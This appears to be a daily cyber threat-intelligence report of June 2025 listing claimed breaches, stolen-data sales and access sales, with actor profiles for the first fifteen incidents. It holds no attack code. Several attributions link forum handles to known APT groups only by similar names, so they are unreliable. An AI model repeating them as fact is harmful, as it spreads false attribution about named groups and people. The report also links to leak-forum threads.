[June-06-2025] Daily Cybersecurity Threat Report

I. Executive Summary

This report provides a concise overview of significant cybersecurity incidents observed in the last 24 hours, highlighting key threat actor activities, prevalent attack methodologies, and their broader implications. The current landscape is characterized by the continued dominance of financially motivated ransomware groups and persistent state-sponsored cyber espionage, increasingly augmented by artificial intelligence (AI) capabilities. A notable trend is the industrialization of cybercrime, where specialized actors facilitate complex attacks.

Analysis of recent events indicates that ransomware operations, particularly those employing double extortion tactics, remain a primary and highly impactful threat. Groups such as BlackMatter and BlackSuit are actively targeting high-value entities across various sectors. Concurrently, nation-state actors, predominantly from China, North Korea, and Iran, continue to engage in sophisticated cyber espionage campaigns. These campaigns focus on critical infrastructure, government agencies, and sensitive industries, aiming for intelligence collection and strategic disruption. A significant development observed is the rising influence of AI, which appears to lower the barrier to entry for sophisticated cyberattacks, enabling what some refer to as “zero-knowledge threat actors” and consequently increasing the volume and complexity of threats. Initial access for many of these attacks is frequently gained through highly tailored phishing campaigns and the exploitation of known vulnerabilities in public-facing systems. The cybercrime ecosystem is also exhibiting increased specialization, with Initial Access Brokers (IABs) playing a critical role in facilitating ransomware deployments by providing pre-compromised access to target networks.

II. Incident Overview

This section provides a high-level snapshot of the day’s cyber activity, summarizing all reported breaches, detailing the affected entities, primary threat actors, and initial impact.

Table: Summary of Recent Cybersecurity Incidents

Incident ID	Affected Entity	Primary Threat Actor	Attack Type	Initial Impact	Date Reported
1	jkt48showroom.com	LIUSHEN (Leviathan)	Data Breach	User account database with plaintext passwords	2025-06-06T12:54:45Z
2	Dinas PU Bina Marga dan Tata Ruang (DPUBMBTR) of South Sumatra Province	ksotaria (Kimsuky)	Data Breach	Sensitive employee information	2025-06-06T12:54:10Z
3	Undisclosed (UK Credit Cards)	BlackMaster (BlackMatter)	Data Leak	1K credit card records	2025-06-06T12:49:35Z
4	Undisclosed (Ethereum)	warrtemp13	Malware	Sale of Python-based Ethereum poisoning bot	2025-06-06T12:36:39Z
5	Bolt	Wieko (Peoples Cyber Army)	Data Breach	Detailed driver information from 196 fleets	2025-06-06T12:22:40Z
6	Undisclosed (Crypto Platforms)	TheLibertyCity	Data Leak	50K email:password pairs linked to crypto platforms	2025-06-06T12:19:09Z
7	Ministry of Labour and Social Security (MTSS)	Tacuara	Data Breach	350,800 records of personal data	2025-06-06T12:11:14Z
8	Ministry of Finance Thailand	LongBigDick	Initial Access	Sale of access to data management system	2025-06-06T11:58:23Z
9	Kasikorn Bank	NDT SEC	Alert	Claim to target Kasikorn Bank	2025-06-06T11:43:50Z
10	Daerah Istimewa Yogyakarta (Government Health)	Panda (Aquatic Panda)	Data Breach	Over 2.5 million maternal and public health records	2025-06-06T10:46:34Z
11	Undisclosed (Chinese Corporate Employees)	Panda (Aquatic Panda)	Data Leak	10,923 records of Chinese corporate employees	2025-06-06T10:30:16Z
12	Undisclosed (Kraken.com)	Kaught	Malware	Sale of Kraken.com email checker tool	2025-06-06T09:17:02Z
13	Unknown Source	Саша (Alexander Vinnik)	Data Leak	Sale of live.json files (posts, comments, albums, photos)	2025-06-06T09:15:55Z
14	Undisclosed (U.S. Cloud Services)	black18 (BlackSuit)	Initial Access	Sale of Magento-based admin panel access	2025-06-06T08:40:30Z
15	Directory of Government in China	DigitalGhost (Ghost)	Data Breach	Government leadership profiles, department structures, contact details, laws, policies, economic statistics	2025-06-06T06:54:23Z
16	EMPIRE777	DigitalGhost (Ghost)	Data Breach	Personal data of individuals (PII) from Thailand, Vietnam, Malaysia	2025-06-06T06:07:03Z
17	Jakarta Public Library	KEDIRISECTEAM	Data Breach	609,881 user records (Member ID, Name, Email, Phone, PII)	2025-06-06T05:43:09Z
18	Ministry of Health of Peru	Kitten_FBI_Nz (Fox Kitten)	Data Breach	Documents targeting women for family planning/pregnancy services	2025-06-06T05:39:45Z
19	Undisclosed (WordPress Sites)	get_com	Data Leak	19,000 vulnerable WordPress sites with WooCommerce plugin	2025-06-06T05:18:47Z
20	Bank of America	chuu (UNC3569)	Data Breach	3.5 million customer records (user IDs, names, balances, CVV, expiry)	2025-06-06T05:02:20Z
21	Directorate General of Forestry Law Enforcement	LikeEx01 (ToyMaker)	Data Breach	Database from db_perpusgakkum (21 user records)	2025-06-06T04:47:19Z
22	Fling	Sworz	Data Breach	13.7 GB of data, 40 million users	2025-06-06T04:38:08Z
23	HBOMAX	DigitalGhost (Ghost)	Data Breach	Personal email addresses and plaintext passwords	2025-06-06T04:00:04Z
24	Undisclosed (Credit Cards)	Chap	Data Leak	Over 100,000 credit card records	2025-06-06T03:09:20Z
25	Sagar Marketing	gesss	Initial Access	Admin panel access to sagarmarketing.in	2025-06-06T02:38:26Z
26	The National Digital System	DigitalGhost (Ghost)	Data Leak	Detailed personal and family information of Israeli President Isaac Herzog	2025-06-06T02:32:03Z

III. Detailed Incident Analysis

This section provides an in-depth examination of each significant cybersecurity incident, offering context, technical details, and a comprehensive profile of the associated threat actor(s).

Incident 1: Alleged Sale of JKT48Showroom.com User Account Database

• Date & Time of Breach: 2025-06-06T12:54:45Z
• Incident Summary & Initial Impact: The threat actor claims to be selling a user account database allegedly sourced from jkt48showroom.com, a fan-operated platform aggregating livestream data of JKT48 idols. The leaked dataset reportedly includes account IDs and plaintext passwords, suggesting a serious compromise of user credentials.
• Affected Entity Context: JKT48Showroom.com is a fan-operated platform that aggregates livestream data of JKT48 idols. The JKT48 Showroom Fanmade app, while not directly the website, states that it does not collect or share user data.¹ The victim industry is Entertainment & Movie Production, and the victim country is Indonesia.
• Associated Threat Actor Profile:

• Name/Alias(es): LIUSHEN, also known as Leviathan, APT40, Kryptonite Panda, TEMP.Periscope, TEMP.Jumper, Bronze Mohawk, Mudcarp, Gadolinium, ATK 29, ITG09, TA423, Red Ladon, Gingham Typhoon, and ISLANDDREAMS.²
• Country of Origin/Affiliation: Chinese-sponsored cyberespionage group.²
• Motivations: Espionage, targeting governmental organizations, companies, and universities across various industries, including biomedical, robotics, and maritime research.²
• Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The threat actor is selling a user account database containing plaintext passwords. This aligns with Leviathan’s broader objective of data exfiltration and intelligence collection.²
• General TTPs and Notable Past Activities of the Actor: Leviathan frequently uses phishing emails with malicious attachments (often JavaScript or macro-enabled Office documents) or links to Google Drive to deploy malware like Cobalt Strike. They exploit vulnerabilities in public-facing infrastructure (e.g., Log4J, Atlassian Confluence, Microsoft Exchange) and conduct strategic web compromises through fake websites. For persistence and data exfiltration, they utilize custom backdoors such as AIRBREAK, BADFLICK, and HOMEFRY, and employ legitimate platforms like GitHub (using steganography) and Dropbox (impersonating API keys) for C2 communications and data staging. They also use protocol tunneling and multi-hop proxies like Tor to obscure their tracks.²

• Technical Context & Attack Chain: The incident involves the alleged sale of a user account database with plaintext passwords, indicating a direct compromise of user credentials from the jkt48showroom.com platform. The specific method of initial access for this incident is not detailed, but it aligns with Leviathan’s known TTPs of exploiting vulnerabilities or using phishing to gain access to sensitive data.
• References:

• Published URL: https://darkforums.st/Thread-USER-ACCOUNT-jkt48showroom-com
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/a9eac07e-a1bb-4ebe-bfe6-8bb659d4ed45.PNG

Incident 2: Alleged database leak of Dinas PU Bina Marga dan Tata Ruang (DPUBMBTR) of South Sumatra Province, Indonesia.

• Date & Time of Breach: 2025-06-06T12:54:10Z
• Incident Summary & Initial Impact: The threat actor claims to have leaked the database of Dinas PU Bina Marga dan Tata Ruang (DPUBMBTR) of South Sumatra Province, Indonesia. The exposed dataset reportedly includes sensitive employee information such as NIP (civil servant ID), full names, usernames, gubernatorial decrees (SK GUBERNUR), access tokens, PSIP data, and incoming letters (SURAT MASUK).
• Affected Entity Context: Dinas PU Bina Marga dan Tata Ruang (DPUBMBTR) of South Sumatra Province is a key government agency in Indonesia responsible for public works, road infrastructure, and spatial planning. A compromise of this entity could disrupt essential public services and critical infrastructure projects.³ The victim industry is Government & Public Sector, and the victim country is Indonesia.
• Associated Threat Actor Profile:

• Name/Alias(es): ksotaria, also known as Kimsuky.⁴
• Country of Origin/Affiliation: North Korean Advanced Persistent Threat (APT) group.⁴
• Motivations: Cyberespionage, primarily targeting South Korean businesses, government entities, and cryptocurrency users.⁴
• Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The incident involves the alleged leak of a government database containing sensitive employee information. This aligns with Kimsuky’s objective of data exfiltration for intelligence gathering.⁴
• General TTPs and Notable Past Activities of the Actor: Kimsuky typically initiates attacks with phishing campaigns using .lnk files disguised as legitimate documents (e.g., work logs, insurance documents) with Korean lures. They heavily rely on PowerShell scripts for payload delivery, reconnaissance (gathering detailed system information), and execution of next-stage malware. Persistence is often achieved through scheduled tasks, such as “ChromeUpdateTaskMachine.” A key tactic is their use of Dropbox as a primary hosting platform for payloads and for exfiltrating collected system information, leveraging Dropbox’s trusted reputation to bypass conventional security defenses.⁴

• Technical Context & Attack Chain: The alleged database leak suggests unauthorized access to the DPUBMBTR’s systems. While the specific attack chain for this incident is not detailed, it is consistent with Kimsuky’s known methods of gaining initial access through phishing and then performing reconnaissance and data exfiltration. The presence of “access tokens” in the leaked data suggests a potential compromise of authentication mechanisms.
• References:

• Published URL: https://darkforums.st/Thread-LEAKED-DPUBMBTR-SUMATRA-SELATAN
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/bc945fc3-1d43-4f82-a446-8b7058284361.PNG

Incident 3: Alleged sale of credit card data from UK

• Date & Time of Breach: 2025-06-06T12:49:35Z
• Incident Summary & Initial Impact: A threat actor is offering to sell 1K credit card (CC) records from the United Kingdom.
• Affected Entity Context: The victim country is the UK, but no specific victim industry or organization is identified.
• Associated Threat Actor Profile:

• Name/Alias(es): BlackMaster, also known as BlackMatter, a possible rebrand of DarkSide.⁵
• Country of Origin/Affiliation: Ransomware-as-a-service (RaaS) group, appears to target organizations in English-speaking countries like Australia, Canada, the United Kingdom, and the United States.⁶
• Motivations: Financial gain through ransomware attacks, explicitly targeting businesses with more than $100 million in annual revenues.⁶
• Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The threat actor is selling credit card records. While BlackMatter is primarily a ransomware group, they are known to exfiltrate data for extortion purposes.⁵ The sale of stolen data, including financial information, is a common monetization strategy for financially motivated actors.
• General TTPs and Notable Past Activities of the Actor: BlackMatter primarily gains initial access through the compromise of vulnerable edge devices (e.g., remote desktop, virtualization, and VPN appliances) or by abusing corporate credentials obtained from third-party leaks or dark web marketplaces. They leverage credential reuse and the absence of multi-factor authentication. Their payload is a highly efficient C-based executable that encrypts files using a combination of Salsa20 and 1024-bit RSA keys. BlackMatter enumerates Active Directory environments, changes desktop wallpaper to display ransom notes, and can execute in Windows ‘safe-mode’ to evade detection. A critical tactic is their wiping or reformatting of backup data stores and appliances rather than encrypting them, which significantly complicates recovery efforts. Communication with their command-and-control (C2) infrastructure occurs over HTTPS, often impersonating common user-agent strings.⁵

• Technical Context & Attack Chain: The incident involves the alleged sale of credit card data. The specific method of data acquisition is not detailed, but it aligns with BlackMatter’s known methods of initial access and data exfiltration, which could then be sold on underground forums.
• References:

• Published URL: https://forum.exploit.in/topic/260405/?tab=comments#comment-1571918
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/153b243d-83cf-4336-ab8f-da651b1bd4a5.png

Incident 4: Alleged sale of ETH poisoning bot

• Date & Time of Breach: 2025-06-06T12:36:39Z
• Incident Summary & Initial Impact: A threat actor is selling a Python-based Ethereum poisoning bot. The bot automates target identification using smart analysis and executes poisoning via micro ETH transfers or 0-token transfers.
• Affected Entity Context: No specific victim country, industry, or organization is identified. The incident relates to the sale of a malicious tool targeting Ethereum cryptocurrency.
• Associated Threat Actor Profile:

• Name/Alias(es): warrtemp13. No specific threat actor profile for “warrtemp13” is available in the provided research notes.
• Country of Origin/Affiliation: Not specified.
• Motivations: Financial gain, as the actor is selling a tool designed for illicit financial activities.⁷
• Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The actor is selling a Python-based Ethereum poisoning bot. This indicates a focus on developing and monetizing specialized malware for cryptocurrency theft.
• General TTPs and Notable Past Activities of the Actor: As a general cybercriminal, motivations typically include financial gain through activities like stealing sensitive information, conducting ransomware attacks, or engaging in fraud. Their attack arsenal often includes phishing attacks, ransomware, malware, and social engineering.⁷ Underground hacker forums like Exploit.in are known marketplaces for such tools.⁸

• Technical Context & Attack Chain: The incident involves the sale of a malware tool. The bot automates target identification and executes “poisoning” via micro ETH or 0-token transfers, suggesting a sophisticated method to trick users into sending cryptocurrency to attacker-controlled addresses.
• References:

• Published URL: https://forum.exploit.in/topic/260403/?tab=comments#comment-1571915
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/2edfdf93-7e29-44fb-ab05-d6fa83890a7e.png

Incident 5: Alleged database sale of Bolt

• Date & Time of Breach: 2025-06-06T12:22:40Z
• Incident Summary & Initial Impact: The threat actor claims to be selling the database of Bolt. The dataset reportedly includes detailed driver information from 196 fleets, such as driver names, emails, phone numbers, status (e.g., active/blocked), performance metrics (e.g., driver score, acceptance rate, trip statistics), and unique identifiers. The data is shared in CSV format and is being marketed for threat intelligence, fraud, or competitive analysis purposes.
• Affected Entity Context: Bolt is an Estonian multinational mobility company offering ride-hailing, micromobility rental, food and grocery delivery, and carsharing services. It is headquartered in Tallinn and operates in over 600 cities in more than 50 countries.⁹ The victim industry is Transportation & Logistics, and the victim country is Estonia.
• Associated Threat Actor Profile:

• Name/Alias(es): Wieko, also known as Peoples Cyber Army (PCA) or Cyber Army of Russia Reborn.¹⁰
• Country of Origin/Affiliation: Pro-Russian hacktivist group.¹⁰
• Motivations: Political/ideological, supporting Russia’s stance on the Russian-Ukrainian conflict, undermining credibility of government institutions, disrupting critical services, and spreading pro-Russian propaganda.¹⁰
• Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The threat actor is selling a database containing detailed driver information. Data breaches are explicitly mentioned as one of PCA’s employed techniques.¹⁰
• General TTPs and Notable Past Activities of the Actor: PCA’s primary methods include large-scale Distributed Denial of Service (DDoS) attacks using botnets to overwhelm network bandwidth and website defacement campaigns to spread pro-Russian propaganda. They also engage in data breaches and exploit vulnerabilities in internet-facing applications to gain initial access and escalate privileges. The group collaborates with other pro-Russian hacktivist groups like HackNeT and NoName057(16) to expand their operational reach and impact.¹⁰

• Technical Context & Attack Chain: The incident involves the alleged sale of a database from Bolt, containing sensitive driver information. This suggests a successful data breach. While the specific method of initial access is not detailed for this incident, it aligns with PCA’s known TTPs of exploiting public-facing applications or other vulnerabilities to gain access and exfiltrate data.
• References:

• Published URL: https://darkforums.st/Thread-Bolt-Databreach-May-2025
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/f3bb4eb2-d281-4d36-89c4-958b5335705e.PNG

Incident 6: Alleged Sale of 50K Crypto Credentials

• Date & Time of Breach: 2025-06-06T12:19:09Z
• Incident Summary & Initial Impact: A threat actor claims to be selling a dump containing 50,000 email:password pairs linked to crypto platforms. The dataset reportedly includes accounts involved in trading activity.
• Affected Entity Context: No specific victim country, industry, or organization is identified. The incident involves credentials for crypto platforms.
• Associated Threat Actor Profile:

• Name/Alias(es): TheLibertyCity. No specific threat actor profile for “TheLibertyCity” is available in the provided research notes. The term “Liberty City” appears in contexts related to video games or geographical locations, not cybercrime groups.¹¹
• Country of Origin/Affiliation: Not specified.
• Motivations: Financial gain, as the actor is selling credentials for crypto platforms, likely for further fraudulent activities or account takeover.⁷
• Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The actor is selling a dump of 50,000 email:password pairs. This indicates a successful credential theft operation.
• General TTPs and Notable Past Activities of the Actor: Financially motivated cybercriminals commonly steal sensitive information like credit card data and personal information for sale on black markets. Their attack arsenal often includes phishing attacks, ransomware, malware, and social engineering.¹⁷

• Technical Context & Attack Chain: The incident involves the alleged sale of a large dataset of crypto credentials. The method of compromise is not specified, but it likely involves phishing, infostealer malware, or exploitation of vulnerabilities on crypto platforms to obtain these credentials.
• References:

• Published URL: https://forum.exploit.in/topic/260399/?tab=comments#comment-1571904
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/64176be6-c3c9-4799-a918-977a07b8fa90.png

Incident 7: Alleged database sale of Ministry of Labour and Social Security (MTSS)

• Date & Time of Breach: 2025-06-06T12:11:14Z
• Incident Summary & Initial Impact: The threat actor claims to be selling the database of Ministry of Labour and Social Security (MTSS). The dataset reportedly contains 350,800 records, including personal data such as names, national ID numbers, email addresses, phone numbers, birthdates, physical locations, and facial photos.
• Affected Entity Context: The Ministry of Labour and Social Security (MTSS) in Uruguay is a government administration responsible for monitoring labor laws, ensuring compliance, issuing penalties, and providing legal protection for workers. It also plays a role in child labor issues.¹⁸ The victim industry is Government Administration, and the victim country is Uruguay.
• Associated Threat Actor Profile:

• Name/Alias(es): Tacuara. No specific threat actor profile for “Tacuara” as a cybercrime group is available in the provided research notes. The term “Tacuara” appears in a book title related to history.¹⁹ A Russia-aligned hacking group named TAG-110 is mentioned in relation to espionage campaigns, but no direct link to “Tacuara”.²⁰
• Country of Origin/Affiliation: Not specified.
• Motivations: Financial gain, as the actor is selling a government database containing sensitive personal data.⁷
• Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The actor is selling a database with 350,800 records of personal data. This indicates a successful data breach and exfiltration.
• General TTPs and Notable Past Activities of the Actor: Financially motivated cybercriminals commonly steal sensitive information for sale on black markets. Their attack arsenal often includes phishing attacks, ransomware, malware, and social engineering.¹⁷

• Technical Context & Attack Chain: The incident involves the alleged sale of a large government database. The specific method of compromise is not detailed, but it suggests unauthorized access to the MTSS systems and subsequent data exfiltration.
• References:

• Published URL: https://darkforums.st/Thread-Selling-350800-db-api-mtss-gub-uy
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/bd61f926-2bb5-46a1-9e1f-17b0f3fdd0db.PNG

Incident 8: Alleged sale of unauthorized access to Ministry of finance, Thailand

• Date & Time of Breach: 2025-06-06T11:58:23Z
• Incident Summary & Initial Impact: The threat actor claims to be selling access to the Ministry of Finance Thailand’s data management system.
• Affected Entity Context: The Ministry of Finance Thailand oversees various matters concerning public finance, taxation, treasury, government property, and operations of government monopolies. It also provides loan guarantees for government agencies and state enterprises.²¹ The victim industry is Government Administration, and the victim country is Thailand.
• Associated Threat Actor Profile:

• Name/Alias(es): LongBigDick. No specific threat actor profile for “LongBigDick” is available in the provided research notes. The term appears in a song lyric related to hacking.²²
• Country of Origin/Affiliation: Not specified.
• Motivations: Financial gain, as the actor is selling unauthorized access to a government system.⁷
• Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The actor is selling access to a data management system, indicating a successful initial access operation. This aligns with the activities of Initial Access Brokers (IABs) who specialize in acquiring and selling access to high-value organizations.²⁴
• General TTPs and Notable Past Activities of the Actor: Financially motivated cybercriminals commonly seek to gain and sell unauthorized access to systems. Their attack arsenal often includes phishing, exploitation of vulnerabilities, and other methods to achieve initial access.¹⁷

• Technical Context & Attack Chain: The incident involves the alleged sale of access to a government data management system. This suggests a successful compromise of the Ministry of Finance Thailand’s network, likely through exploiting a vulnerability or compromised credentials to gain an initial foothold.
• References:

• Published URL: https://ramp4u.io/threads/ministry-of-finance-thailand-api-ftp-mysql.3174/
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/d12ec87f-e6ef-47cf-8d2c-10be531f5cd9.png

Incident 9: NDT SEC claims to target Kasikorn Bank

• Date & Time of Breach: 2025-06-06T11:43:50Z
• Incident Summary & Initial Impact: A recent post by the group claims that they are targeting Kasikorn Bank.
• Affected Entity Context: Kasikorn Bank is a major Thai bank established in 1945, offering a wide range of financial products and services. It operates numerous branches across Thailand and has overseas offices.²⁶
• Associated Threat Actor Profile:

• Name/Alias(es): NDT SEC.
• Country of Origin/Affiliation: Hacktivist group, known for targeting Thailand’s infrastructure.²⁷
• Motivations: Geopolitical and cultural disputes, such as ongoing Thai claims on Angkor Wat, cultural reasons (some reportedly assert that Thailand is “mimicking” their culture), and Thailand’s stance on the Israel-Gaza conflict.²⁷
• Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The group publicly claimed to be targeting Kasikorn Bank, indicating an intent to disrupt or compromise the financial institution. This aligns with hacktivist motivations to make political statements or cause disruption.²⁷
• General TTPs and Notable Past Activities of the Actor: NDT SEC is known for data leaks and launching Distributed Denial of Service (DDoS) attacks, which cause server disruptions. They have been observed collaborating with other hacktivist groups, including “Anonymous Cambodia”.²⁷

• Technical Context & Attack Chain: This incident is an alert of a claimed targeting, rather than a confirmed breach. The threat actor’s public claim on Telegram indicates a potential intent to launch cyberattacks against Kasikorn Bank, consistent with hacktivist methods of publicizing their targets and motivations.
• References:

• Published URL: https://t.me/we_anon_ndtsec/90
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/da47a879-d426-498a-bd59-d88bf59ced40.png

Incident 10: Alleged Data Sale of Indonesian Government Health Records

• Date & Time of Breach: 2025-06-06T10:46:34Z
• Incident Summary & Initial Impact: The threat actor claims to be selling a government health database allegedly containing over 2.5 million records from Yogyakarta, Indonesia. The dataset reportedly includes maternal profiles, public health staff information, patient bias tracking, and system user data, with entries dating through mid-2025. The records are structured in multiple CSV files and include sensitive personal identifiers such as names, national IDs, phone numbers, and medical details.
• Affected Entity Context: Daerah Istimewa Yogyakarta (Yogyakarta Special Province) has various health service facilities, including Puskesmas (public health centers) and hospitals, providing basic and referral health services.³⁰ The victim industry is Hospital & Health Care, and the victim country is Indonesia.
• Associated Threat Actor Profile:

• Name/Alias(es): Panda, also known as Aquatic Panda, Bronze University, Charcoal Typhoon, Earth Lusca, and RedHotel. Tracked as FishMonger by ESET.³¹
• Country of Origin/Affiliation: China-linked APT group, operates under the Winnti Group umbrella, overseen by Chinese contractor i-Soon.³¹
• Motivations: Cyber espionage.³¹
• Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The threat actor is selling a government health database containing over 2.5 million sensitive records. This aligns with Aquatic Panda’s cyber espionage objectives, which include collecting sensitive information from government entities.³¹
• General TTPs and Notable Past Activities of the Actor: Aquatic Panda’s campaigns involve the deployment of various malware families, including ScatterBee (a loader), ShadowPad and Spyder (implants common to China-aligned actors), SodaMaster (an implant also used by APT10), and RPipeCommander (a C++ reverse shell). The group is known for reusing established implants and has targeted governments, Catholic charities, non-governmental organizations (NGOs), and think tanks across Taiwan, Hungary, Turkey, Thailand, France, and the United States.³¹

• Technical Context & Attack Chain: The incident involves the alleged sale of a large government health database, indicating a successful data breach and exfiltration. While the exact initial access vector for this campaign is not known, it is consistent with Aquatic Panda’s methods of targeting government entities for intelligence collection.
• References:

• Published URL: https://darkforums.st/Thread-Selling-BIG-BREACH-IndonesiaGovHealth-2025-%E2%80%93-2-5M-Maternal-Public-Health-Records-Exposed
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/4d8b17d2-9296-416b-8302-be2f799d3459.PNG

Incident 11: Alleged Database Sale of Chinese Corporate Employees

• Date & Time of Breach: 2025-06-06T10:30:16Z
• Incident Summary & Initial Impact: The threat actor claims to be selling a database of Chinese corporate employees, comprising 10,923 records allegedly sourced from internal HR systems and organizational charts of various Chinese companies. The dataset reportedly includes full names, mobile numbers, national ID numbers, company names, departments, and job titles. The records are formatted as a CSV file and are being marketed for use in recruitment, B2B outreach, or OSINT purposes.
• Affected Entity Context: The victim country is China, but no specific victim industry or organization is identified beyond “Chinese corporate employees.”
• Associated Threat Actor Profile:

• Name/Alias(es): Panda, also known as Aquatic Panda, Bronze University, Charcoal Typhoon, Earth Lusca, and RedHotel. Tracked as FishMonger by ESET.³¹
• Country of Origin/Affiliation: China-linked APT group, operates under the Winnti Group umbrella, overseen by Chinese contractor i-Soon.³¹
• Motivations: Cyber espionage.³¹
• Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The threat actor is selling a database of Chinese corporate employees, including sensitive personal and professional details. This aligns with Aquatic Panda’s cyber espionage objectives, which include collecting industrial intelligence.³¹
• General TTPs and Notable Past Activities of the Actor: Aquatic Panda’s campaigns involve the deployment of various malware families, including ScatterBee (a loader), ShadowPad and Spyder (implants common to China-aligned actors), SodaMaster (an implant also used by APT10), and RPipeCommander (a C++ reverse shell). The group is known for reusing established implants and has targeted governments, Catholic charities, non-governmental organizations (NGOs), and think tanks across Taiwan, Hungary, Turkey, Thailand, France, and the United States.³¹

• Technical Context & Attack Chain: The incident involves the alleged sale of a database of corporate employee information, suggesting a successful data breach from internal HR systems or organizational charts. This is consistent with Aquatic Panda’s focus on intelligence collection.
• References:

• Published URL: https://darkforums.st/Thread-Selling-ChinaCorpEmployees-2025-%E2%80%93-10-923-records-Full-Company-Employee-Directory
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/1ae49533-7c1b-475d-9b3c-b7bf14889ee0.PNG

Incident 12: Alleged Sale of Kraken Email Checker

• Date & Time of Breach: 2025-06-06T09:17:02Z
• Incident Summary & Initial Impact: The threat actor claims to be selling a high-speed Kraken.com email checker tool designed to extract active accounts from large email databases. According to the actor, the tool boasts 80% accuracy, supports processing over 500,000 emails, and uses anti-ban techniques to avoid detection.
• Affected Entity Context: No specific victim country, industry, or organization is identified. The incident relates to the sale of a malicious tool targeting email accounts, potentially for credential stuffing or other fraudulent activities.
• Associated Threat Actor Profile:

• Name/Alias(es): Kaught. No specific threat actor profile for “Kaught” is available in the provided research notes. The term appears in contexts related to law enforcement actions against cybercrime or general threat actor definitions.³²
• Country of Origin/Affiliation: Not specified.
• Motivations: Financial gain, as the actor is selling a tool designed to facilitate the extraction of active email accounts, likely for illicit purposes.⁷
• Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The actor is selling an email checker tool, indicating a focus on developing and monetizing tools for credential harvesting or account validation.
• General TTPs and Notable Past Activities of the Actor: Financially motivated cybercriminals commonly sell hacking tools and services on dark web forums like BreachForums and Exploit.in.³⁶ Their attack arsenal often includes phishing attacks, ransomware, malware, and social engineering.⁷

• Technical Context & Attack Chain: The incident involves the sale of a specialized tool designed for mass email account validation. This tool’s capabilities (high accuracy, processing large volumes, anti-ban techniques) suggest a sophisticated approach to automating illicit activities, likely for credential stuffing or spamming campaigns.
• References:

• Published URL: https://breach-forums.st/Thread-SELLING-Kraken-Email-Checker-%E2%80%93-80-Accuracy-800-CPM-500k-Emails-LIMITED-OFFER-%E2%80%93-10-COPIES
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/13fd3e7f-09fc-4ce3-ba0b-1c837b5dc6dc.png

Incident 13: Alleged Sale of Unknown Source JSON Data

• Date & Time of Breach: 2025-06-06T09:15:55Z
• Incident Summary & Initial Impact: The threat actor claims to be selling several live.json files, including posts, comments, albums, and photos.
• Affected Entity Context: No specific victim country, industry, or organization is identified. The incident involves the sale of various types of JSON data.
• Associated Threat Actor Profile:

• Name/Alias(es): Саша, also known as Alexander Vinnik or Sasha WME.⁴²
• Country of Origin/Affiliation: Russian entrepreneur.⁴²
• Motivations: Money laundering, facilitating illicit transactions for cybercriminals.⁴²
• Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The actor is selling live JSON files containing various types of data. While Alexander Vinnik is primarily known for money laundering through cryptocurrency exchanges, the sale of stolen data is a common activity in the cybercrime ecosystem he was allegedly involved in.⁴²
• General TTPs and Notable Past Activities of the Actor: Alexander Vinnik was the co-founder of the BTC-e cryptocurrency exchange, which was allegedly used to launder billions of dollars for cybercriminals worldwide. Some funds processed by BTC-e were even traced to Fancy Bear, a Russian military intelligence hacking unit. His case highlights the critical role of cryptocurrency exchanges in facilitating large-scale cybercrime and potentially supporting nation-state cyber operations.⁴²

• Technical Context & Attack Chain: The incident involves the alleged sale of JSON data, suggesting a data leak from an unspecified source. The term “live” implies the data is current and actively being updated or accessed. The method of data acquisition is not detailed.
• References:

• Published URL: https://leakbase.la/threads/json-files.39154/
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/1a87a6ef-ca10-4f58-bc58-90d7db8e26fb.PNG

Incident 14: Alleged Sale of Magento Admin Panel Tied to U.S. Cloud Services

• Date & Time of Breach: 2025-06-06T08:40:30Z
• Incident Summary & Initial Impact: The threat actor claims to be selling access to a Magento-based admin panel with full rights, allegedly tied to a U.S. cloud service for files and software transactions.
• Affected Entity Context: The victim country is the USA, but no specific victim industry or organization is identified beyond a “U.S. cloud service.” Magento is a popular e-commerce platform.
• Associated Threat Actor Profile:

• Name/Alias(es): black18, also known as BlackSuit, a successor to the Royal ransomware group.⁴³
• Country of Origin/Affiliation: Financially motivated threat actor.⁴³
• Motivations: Financial gain through extortion, demanding high ransoms.⁴³
• Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The actor is selling access to an admin panel with full rights. BlackSuit is known to partner with initial access brokers to facilitate their intrusions, and selling initial access is a common tactic for financially motivated groups.⁴³
• General TTPs and Notable Past Activities of the Actor: BlackSuit’s initial access vectors include phishing campaigns (spearphishing attachments), Remote Desktop Protocol (RDP) exploitation (brute-force attacks or exploiting public-facing vulnerabilities), and partnerships with initial access brokers. They employ double extortion tactics, exfiltrating sensitive data before encryption. They utilize partial encryption techniques to speed up attacks and evade detection. Cobalt Strike is a primary tool for execution and lateral movement, alongside PowerShell scripting. Persistence is established via registry Run keys, and they use credential access techniques like AS-REP Roasting, Kerberoasting, and LSASS memory dumping.⁴³

• Technical Context & Attack Chain: The incident involves the alleged sale of full administrative access to a Magento panel hosted on a U.S. cloud service. This implies a successful compromise of the cloud environment or the Magento application itself, likely through exploitation of vulnerabilities or stolen credentials, consistent with BlackSuit’s initial access methods.
• References:

• Published URL: https://forum.exploit.in/topic/260382/
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/36db52c3-7bb7-49e7-aa9d-e8522319a70d.PNG

Incident 15: Alleged databse leak of Directory of Government in China

• Date & Time of Breach: 2025-06-06T06:54:23Z
